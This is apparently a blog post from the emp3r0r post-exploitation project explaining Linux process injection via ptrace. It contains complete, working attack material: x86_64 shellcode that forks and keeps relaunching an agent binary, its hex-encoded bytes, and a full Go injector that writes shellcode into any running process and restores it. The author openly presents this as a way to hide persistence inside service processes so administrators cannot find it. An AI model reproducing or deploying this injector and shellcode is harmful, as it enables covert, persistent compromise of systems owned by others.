Process Injection In Linux
Background
The techniques covered in this article are part of emp3r0r project.
Linux has something that other platforms don't, the procfs
, as Unix people always like to say "Everything is a file". From /proc/pid/maps
we can read the process's memory mappings, and with /proc/pid/mem
we can even modify its memory with ease (it's almost the same as modifying an actual file).
Theoretically speaking, we are able to inject code into arbitrary processes, with just procfs
and dd
. There is even a poc project if you google it.
But since Linux provides an interface for us to tamper with processes, we would just use it if possible.
Unlike Windows, Linux has and only has this one API for process tampering, it is
ptrace
Yeah, it's ptrace
.
Then how do we inject code with ptrace
?
PTRACE_ATTACH
to target process, thus taking control of itPTRACE_POKETEXT
your shellcode at whereRIP
is pointing- Recover the process with previously backed up code
- Shellcode gets executed until
int 3
trap, the process getstrap
ped and giving up control to us - We restore the code, along with the registers
- The process executes on, like nothing has ever happened
Restore injected process
It looks easy, doesn't it?
But it's not, the process may or may not recover, it all depends on your shellcode itself. Just restoring the code and registers is not enough, as your shellcode has messed up the stack as well.
And you wouldn't like the shellcode blocking main thread, that way we wouldn't be talking about process recovery anymore, we would be talking about execve
.
Yes, some shellcode do execve
in the current process, effectively making the original process gone for good.
Therefore, we will just fork
a new child, and put our shellcode in it.
You can clone
as well, it just doesn't make much difference.
Linux x64 shellcode 101
It's actually a 101 for myself, as I have never written any shellcode before.
With Duckduckgo and some help from some AOSC Linux folks, I was able to roll out my own "hello world" shellcode.
It's much more than a "hello world", it's a guardian shellcode.
How
What language
Of course you write assembly to get your shellcode, that's what it is.
But with the help of a C compiler, the job can be done more quickly, as recommended by a friend:
As you can see in the code, char buf[]
takes care of our "Hello World\n" string data, we don't need to worry about stack allocation anymore.
This article however, will use the traditional assembly way, as I want to learn it.
What editor
I would use vim.
And nasm for assembler.
nasm
I wouldn't use section .data
as it brings more \0
bytes.
An nasm assembly code targeting x86_64
:
BITS 64
global _start
section .text
_start:
...your code...
global _start
is like main
, it's for linkers. BITS 64
tells nasm this is 64 bit assembly.
hex string
You have to assemble your code into raw bytes:
❯ nasm yourshellcode.asm -o shellcode.bin
And raw bytes to hex string:
❯ xxd -i shellcode.bin | grep 0x | tr -d '[:space:]' | tr -d ',' | sed 's/0x/\\x/g'
\x48\x31\xc0\x48\x31\xff\xb0\x39\x0f\x05\x48\x83\xf8\x00\x7f\x5e\x48\x31\xc0\x48\x31\xff\xb0\x39\x0f\x05\x48\x83\xf8\x00\x74\x2c\x48\x31\xff\x48\x89\xc7\x48\x31\xf6\x48\x31\xd2\x4d\x31\xd2\x48\x31\xc0\xb0\x3d\x0f\x05\x48\x31\xc0\xb0\x23\x6a\x0a\x6a\x14\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x0f\x05\xe2\xc4\x48\x31\xd2\x52\x48\x31\xc0\x48\xbf\x2f\x2f\x74\x6d\x70\x2f\x2f\x65\x57\x54\x5f\x48\x89\xe7\x52\x57\x48\x89\xe6\x6a\x3b\x58\x99\x0f\x05\xcd\x03
With rax2
:
❯ rax2 -S < shellcode.bin
4831c04831ffb0390f054883f8007f5e4831c04831ffb0390f054883f800742c4831ff4889c74831f64831d24d31d24831c0b03d0f054831c0b0236a0a6a144889e74831f64831d20f05e2c44831d2524831c048bf2f2f746d702f2f6557545f4889e752574889e66a3b58990f05cd03
rax2
is part of radare2
.
syscall
syscall NR
Why is it prefixed NR?I looked it up and it seems to be abbreviation of Numeric Reference.
You give Linux an NR to let it know which syscall you are calling.
Here's a comlete syscall table for Linux.
You need to note that syscalls may differ under different architectures.
We care about x86_64 only, BTW why do you even consider writing x86 assembly for Linux? It's 2021 guys, x86 has been deprecated since like ten years ago!
Calling convention
Calling a syscall is no different than calling other functions, it's just we have to do that in assembly, without C compiler's help.
Meaning we need to set up its arguments manually, it's not easy for certain syscalls, but they are all the same:
For x86_64, you put syscall NR into RAX
, args into RDI
, RSI
, RDX
... then syscall
(aka. int 0x80
) to execute the call, RAX
gets updated with return value after it's done.
Some syscall arguments are pointer type, you need to pass addresses (instead of data) to them.
A guardian shellcode
This shellcode is part of emp3r0r.
Some tips:
- When pointer is required, you
push
your data onto the stack, then pass theRSP
value push
takes no more than 4 bytes of immediate number, if you need topush
more than 4 bytes, store them in a register andpush
the register instead- Terminate the char array and string array with
\0
, which youpush
first - Don't use reserved words in label names, for example,
wait
If you were not using nasm, these might not be what you need to see.
And:
- Why
wait
? Because we end up with zombie children if we don't - Why
fork
twice? Becauseexecve
replaces current process with a new image - Why
sleep
? Because we don't want the CPU to fly - Why
int 0x3
? Because we have to pause (trap
) the shellcode in order to restore the process
BITS 64
section .text
global _start
_start:
;; fork
xor rax, rax
xor rdi, rdi
mov al, 0x39; syscall fork
syscall
cmp rax, 0x0; check return value
jg pause; int3 if in parent
watchdog:
;; fork to exec agent
xor rax, rax
xor rdi, rdi
mov al, 0x39; syscall fork
syscall
cmp rax, 0x0; check return value
je exec; exec if in child
wait4zombie:
;; wait to clean up zombies
xor rdi, rdi
mov rdi, rax
xor rsi, rsi
xor rdx, rdx
xor r10, r10
xor rax, rax
mov al, 0x3d
syscall
sleep:
;; sleep
xor rax, rax
mov al, 0x23; syscall nanosleep
push 10; sleep nano sec
push 20; sec
mov rdi, rsp
xor rsi, rsi
xor rdx, rdx
syscall
loop watchdog
exec:
;; char **envp
xor rdx, rdx
push rdx; '\0'
;; char *filename
xor rax, rax
mov rdi, 0x652f2f706d742f2f; path to the executable
push rdi; save to stack
push rsp
pop rdi
mov rdi, rsp; you can delete this as it does nothing
;; char **argv
push rdx; '\0'
push rdi
mov rsi, rsp; argv[0]
push 0x3b; syscall execve
pop rax; ready to call
cdq
syscall
pause:
;; trap
int 0x3
Weaponize it
Inject shellcode
emp3r0r automatically injects the guardian shellcode into common processes:
Now we have a bunch of guardian code running inside target system's service processes, it would be a disaster for system admins as they can never find where the hell our guardian angel hides, until he reboot the whole system.
If you were interested, write any shellcode to play with.
So how do we inject? Here's emp3r0r's approach:
// Injector inject shellcode to arbitrary running process
// target process will be restored after shellcode has done its job
func Injector(shellcode *string, pid int) error {
// format
*shellcode = strings.Replace(*shellcode, ",", "", -1)
*shellcode = strings.Replace(*shellcode, "0x", "", -1)
*shellcode = strings.Replace(*shellcode, "\\x", "", -1)
// decode hex shellcode string
sc, err := hex.DecodeString(*shellcode)
if err != nil {
return fmt.Errorf("Decode shellcode: %v", err)
}
// inject to an existing process or start a new one
// check /proc/sys/kernel/yama/ptrace_scope if you cant inject to existing processes
if pid == 0 {
// start a child process to inject shellcode into
sec := strconv.Itoa(RandInt(10, 30))
child := exec.Command("sleep", sec)
child.SysProcAttr = &syscall.SysProcAttr{Ptrace: true}
err = child.Start()
if err != nil {
return fmt.Errorf("Start `sleep %s`: %v", sec, err)
}
pid = child.Process.Pid
// attach
err = child.Wait() // TRAP the child
if err != nil {
log.Printf("child process wait: %v", err)
}
log.Printf("Injector (%d): attached to child process (%d)", os.Getpid(), pid)
} else {
// attach to an existing process
proc, err := os.FindProcess(pid)
if err != nil {
return fmt.Errorf("%d does not exist: %v", pid, err)
}
pid = proc.Pid
// https://github.com/golang/go/issues/43685
runtime.LockOSThread()
defer runtime.UnlockOSThread()
err = syscall.PtraceAttach(pid)
if err != nil {
return fmt.Errorf("ptrace attach: %v", err)
}
_, err = proc.Wait()
if err != nil {
return fmt.Errorf("Wait %d: %v", pid, err)
}
log.Printf("Injector (%d): attached to %d", os.Getpid(), pid)
}
// read RIP
origRegs := &syscall.PtraceRegs{}
err = syscall.PtraceGetRegs(pid, origRegs)
if err != nil {
return fmt.Errorf("my pid is %d, reading regs from %d: %v", os.Getpid(), pid, err)
}
origRip := origRegs.Rip
log.Printf("Injector: got RIP (0x%x) of %d", origRip, pid)
// save current code for restoring later
origCode := make([]byte, len(sc))
n, err := syscall.PtracePeekText(pid, uintptr(origRip), origCode)
if err != nil {
return fmt.Errorf("PEEK: 0x%x", origRip)
}
log.Printf("Peeked %d bytes of original code: %x at RIP (0x%x)", n, origCode, origRip)
// write shellcode to .text section, where RIP is pointing at
data := sc
n, err = syscall.PtracePokeText(pid, uintptr(origRip), data)
if err != nil {
return fmt.Errorf("POKE_TEXT at 0x%x %d: %v", uintptr(origRip), pid, err)
}
log.Printf("Injected %d bytes at RIP (0x%x)", n, origRip)
// peek: see if shellcode has got injected
peekWord := make([]byte, len(data))
n, err = syscall.PtracePeekText(pid, uintptr(origRip), peekWord)
if err != nil {
return fmt.Errorf("PEEK: 0x%x", origRip)
}
log.Printf("Peeked %d bytes of shellcode: %x at RIP (0x%x)", n, peekWord, origRip)
// continue and wait
err = syscall.PtraceCont(pid, 0)
if err != nil {
return fmt.Errorf("Continue: %v", err)
}
var ws syscall.WaitStatus
_, err = syscall.Wait4(pid, &ws, 0, nil)
if err != nil {
return fmt.Errorf("continue: wait4: %v", err)
}
// what happened to our child?
switch {
case ws.Continued():
return nil
case ws.CoreDump():
err = syscall.PtraceGetRegs(pid, origRegs)
if err != nil {
return fmt.Errorf("read regs from %d: %v", pid, err)
}
return fmt.Errorf("continue: core dumped: RIP at 0x%x", origRegs.Rip)
case ws.Exited():
return nil
case ws.Signaled():
err = syscall.PtraceGetRegs(pid, origRegs)
if err != nil {
return fmt.Errorf("read regs from %d: %v", pid, err)
}
return fmt.Errorf("continue: signaled (%s): RIP at 0x%x", ws.Signal(), origRegs.Rip)
case ws.Stopped():
stoppedRegs := &syscall.PtraceRegs{}
err = syscall.PtraceGetRegs(pid, stoppedRegs)
if err != nil {
return fmt.Errorf("read regs from %d: %v", pid, err)
}
log.Printf("Continue: stopped (%s): RIP at 0x%x", ws.StopSignal().String(), stoppedRegs.Rip)
// restore registers
err = syscall.PtraceSetRegs(pid, origRegs)
if err != nil {
return fmt.Errorf("Restoring process: set regs: %v", err)
}
// breakpoint hit, restore the process
n, err = syscall.PtracePokeText(pid, uintptr(origRip), origCode)
if err != nil {
return fmt.Errorf("POKE_TEXT at 0x%x %d: %v", uintptr(origRip), pid, err)
}
log.Printf("Restored %d bytes at origRip (0x%x)", n, origRip)
// let it run
err = syscall.PtraceDetach(pid)
if err != nil {
return fmt.Errorf("Continue detach: %v", err)
}
log.Printf("%d will continue to run", pid)
return nil
default:
err = syscall.PtraceGetRegs(pid, origRegs)
if err != nil {
return fmt.Errorf("read regs from %d: %v", pid, err)
}
log.Printf("continue: RIP at 0x%x", origRegs.Rip)
}
return nil
}
This is probably the first ptrace
based linux process injection tool written in pure Go.
Several things to notice if you want to build your own:
- Go's syscall wrappers are undocumented
ptrace
has to stay in one thread otherwise you lose your tracee, this is a Linux/Unix issue- but it's also a Go issue, as Go loves using goroutine. I had to put
runtime.LockOSThread()
beforesyscall.Ptrace*
to solve this issue
I would like to give Go a medal for its PTRACE_POKETEXT
and PTRACE_PEEKTEXT
wrapper, because not having to peek/poke one word at a time is such a relief for lazy users like me.
The key point here is int 0x3
, it causes the current process to pause (trap
), giving its parent (tracer) full control, and that's when we start to restore the original process.
Get persistence with shellcode
Injecting the guardian shellcode into some import service processes, is a better way to get "persistence".
It's hard to get caught, and easy to resurrect our agent.
This is a simple sleep demo program, which we will inject into.
/*
* This program is used to check shellcode injection
* */
#include <stdio.h>
#include <time.h>
#include <unistd.h>
int main(int argc, char* argv[])
{
time_t rawtime;
struct tm* timeinfo;
while (1) {
sleep(1);
time(&rawtime);
timeinfo = localtime(&rawtime);
printf("%s: sleeping\n", asctime(timeinfo));
}
return 0;
}
The sleep
program sleeps on, with a new child process to guard our agent.
Comments
comments powered by Disqus